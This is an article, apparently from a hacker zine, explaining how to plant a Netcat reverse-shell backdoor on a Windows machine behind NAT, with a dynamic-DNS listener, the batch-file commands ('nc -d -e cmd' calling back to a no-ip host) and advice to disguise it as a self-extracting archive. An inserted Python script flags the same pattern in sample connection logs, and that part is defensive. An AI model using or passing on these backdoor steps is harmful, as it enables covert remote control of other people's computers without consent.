Backdooring the NAT'ed Network

by David Dunn

Two things to mention before we begin:

1.)  The method I am describing here is illegal without permission from the party being backdoored and is extremely easy to trace.  If you use this against anyone who would prosecute you, you will be caught and convicted.  So don't.

2.)  All of the methods described in this article (client, server, or both) can be recreated with almost no changes on any Linux machine using the same tools, but for the sake of time and the popularity of the Windows OS, I'm only going to cover Windows 2000 and Windows XP here.

Network Address Translation: An Introduction

Network Address Translation (or NAT) is extremely useful in today's high-bandwidth environment.

Homes and businesses connected to the Internet via cable modem or DSL can use a router running NAT to connect multiple machines to the Internet simultaneously while still only having to pay for one connection and one external IP address.

The downside (for anyone attempting to install a backdoor, that is) is that the router acts as a one-way valve: it allows computers on the internal network to establish connections to the outside, but computers on the Internet cannot initiate direct connections to computers inside the network.

For this reason, it is necessary to create a backdoor that will attempt to reach us instead of one that will merely run in the background, awaiting a connection.

Part One: Setting Up Your Return Address

The idea here is that the backdoor you install is going to contact you, so the first thing you have to do is make yourself available for contact.

A good way to do this is by setting up an account with a Dynamic DNS service like No-Ip.  There are several places like this and most offer some type of free service for domains that are just a sub-domain of their own (for example, yourname.no-ip.com).  Just download their update utility and install it on your machine.  Whenever your IP address changes, the DNS records for your domain will be automatically updated.

Once you've registered your domain and have it forwarding to your IP address, it's time to set up the server that will listen for connections from your backdoor.

For the purposes of this article, I'm going to use port 10515 for incoming connections, but you can use any port you like.

First, download Netcat for Windows from www.atstake.com/research/tools/network_utilities/nc11nt.zip and unzip it.

Next, in the same directory to which you unzipped Netcat, create a new text file, and call it: SERVER.BAT

This file should include the following:

@echo off
cls
nc.exe -v -v -L -p 10515

Run this new batch file and you should see a new terminal window that reads:

listening on [192.168.0.1] 10515 ...

In this example, 192.168.0.1 is the IP address of the machine that SERVER.BAT is running on.

If you are behind a router, you're going to need to forward incoming port 10515 on your router to port 10515 on the machine SERVER.BAT is running on.  If you don't have a router and are connected directly to the Internet, don't worry about it; you're done.

Part Two: Creating the Backdoor

So now all that's left is to create the backdoor that is going to sit on our target machine and connect to the server.

Make another new text file, and call it BACKDOOR.BAT, and include the following:

@echo off
echo You have been owned.
nc -d -e cmd -t yourname.no-ip.com 10515

Basically, this is telling Netcat to:

  1. Detach from the console and run in the background (-d).
  2. Execute the command cmd (-e cmd).
  3. Answer Telnet negotiation (-t).
  4. Connect to your server at yourname.no-ip.com on port 10515.
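Because this traffic leaves the network like any other outbound connection, the defender's angle is to look for its shape rather than its direction.  The following is an added example, not part of the original article: it scans constructed outbound-connection records for the pattern above (Netcat's -e wiring a shell to the socket, a shell process owning a socket, and a dynamic-DNS return address on an unusual port).  The log line format, the SHELLS set and the DYNDNS_SUFFIXES list are assumptions.

```python
"""Flag outbound connections matching the nc -e cmd reverse-shell pattern."""
import re

# Constructed sample records in a hypothetical outbound-connection log format:
# timestamp, process name, full command line, destination host:port.
SAMPLE_LOG = """\
2004-03-01T10:15:01 proc=nc.exe cmdline="nc -d -e cmd -t yourname.no-ip.com 10515" dst=yourname.no-ip.com:10515
2004-03-01T10:15:07 proc=iexplore.exe cmdline="iexplore.exe" dst=www.example.com:80
2004-03-01T10:16:12 proc=nc.exe cmdline="nc -v -v 10.0.0.5 25" dst=10.0.0.5:25
2004-03-01T10:17:30 proc=cmd.exe cmdline="cmd" dst=203.0.113.7:4444
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) proc=(?P<proc>\S+) cmdline="(?P<cmdline>[^"]*)" '
    r'dst=(?P<host>[^:\s]+):(?P<port>\d+)$')
SHELLS = {"cmd", "cmd.exe", "command.com", "powershell.exe", "/bin/sh", "/bin/bash"}
DYNDNS_SUFFIXES = (".no-ip.com", ".no-ip.org", ".dyndns.org")  # assumption: extend as needed

def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield {**m.groupdict(), "port": int(m.group("port"))}

def reasons(ev):
    """Return the list of rules an event trips (empty list means benign)."""
    hits = []
    args = ev["cmdline"].split()
    # Rule 1: Netcat's -e followed by a shell name (the "-e cmd" in BACKDOOR.BAT).
    for i, a in enumerate(args[:-1]):
        if a == "-e" and args[i + 1].lower() in SHELLS:
            hits.append("nc -e spawns a shell")
    # Rule 2: a command interpreter owning an outbound socket directly.
    if ev["proc"].lower() in SHELLS:
        hits.append("shell process opened an outbound socket")
    # Rule 3: a dynamic-DNS destination on a port that is not plain web traffic.
    if ev["host"].lower().endswith(DYNDNS_SUFFIXES) and ev["port"] not in (80, 443):
        hits.append("dynamic-DNS destination on non-standard port")
    return hits

def flag_reverse_shells(log_text):
    """Return [(timestamp, process, [reasons])] for every suspicious event."""
    flagged = []
    for ev in parse(log_text):
        why = reasons(ev)
        if why:
            flagged.append((ev["ts"], ev["proc"], why))
    return flagged

if __name__ == "__main__":
    for ts, proc, why in flag_reverse_shells(SAMPLE_LOG):
        print(ts, proc, "; ".join(why))
```

On the sample above, the nc.exe line trips rules 1 and 3 and the cmd.exe line trips rule 2, while the browser and the plain SMTP test with Netcat pass.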

Part Three: Usage

Copy the NC.EXE and the BACKDOOR.BAT files to a directory on the target machine and run BACKDOOR.BAT.

If everything is working correctly, you'll now see a terminal window with our friendly little "You have been owned." message displayed.  Feel free to close this window.

When you return to the server machine, you should now see something to the effect of:

listening on [192.168.0.1] 10515 ...
connect to [192.168.0.1] from hostname [192.168.0.2] 10179
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\backdoor\>

Congratulations, you're in.

If you'd like to make the backdoor a little easier to distribute, you can compress BACKDOOR.BAT and NC.EXE in a ZIP file and use it to create a self-extracting file that will execute the BACKDOOR.BAT program when opened.

Shoutz to Mr. B and jeste|2.
